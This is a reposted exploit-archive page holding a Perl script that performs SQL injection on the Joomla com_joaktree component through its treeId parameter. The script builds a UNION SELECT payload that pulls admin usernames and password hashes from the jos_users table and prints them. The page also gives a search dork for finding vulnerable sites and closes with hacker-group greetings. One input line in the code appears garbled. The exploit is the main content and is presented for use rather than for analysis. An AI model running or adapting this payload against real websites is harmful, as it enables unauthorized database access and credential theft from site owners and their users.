|    |    |    | Today: 19-Nov-2017 |

Joomla! Joaktree Component Exploit

March 8, 2010 | Posted in ExploitAlert

####################################################################################
#[~] Joomla Component com_joaktree SQL injection Exploit - (treeId)
#[~] Author : kaMtiEz (kamzcrew@yahoo.com)
#[~] Homepage : http://www.indonesiancoder.com
#[~] Date : 20 February, 2010
####################################################################################
#
#[ Software Information ]
#
#[+] Vendor : http://joaktree.com/
#[+] Download : http://joaktree.com/index.php/en/joaktree/downloads
#[+] version : 1.1.1 or lower maybe also affected
#[+] Vulnerability : SQL injection
#[+] Dork : inurl:"com_joaktree"
#[+] Type : Free
#
####################################################################################
#
# USAGE : perl kaMz.pl
#
####################################################################################


#!/usr/bin/perl -w

print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [!]Joomla component com_joaktree SQL injection exploit[!] \n\n";
print "\t\t [~] by kaMtiEz [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";

use LWP::UserAgent;

print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=);

$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$Pathloader="version()";

$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$arianom = $IBL13Z . "/index.php?option=com_joaktree&view=joaktree&treeId=-1+union+all+select+1,2,3,".$Pathloader.",5,".$kaMtiEz.",7,8,9,10,11,12,13,14,15,16+from+".$tukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n";
}
else{print "\n[+] Exploit GAGAL GAN ![+]\n";
}



reference : http://blog.indonesiancoder.com/joomla-joaktree-component-sql-injection

####################################################################################
#
# GREETZZZZZ :
#
# INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
# tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
# Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13z,r3m1ck
# Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
#
####################################################################################

Taged in: com, contrex, information vendor, Joomla, SQL, usr bin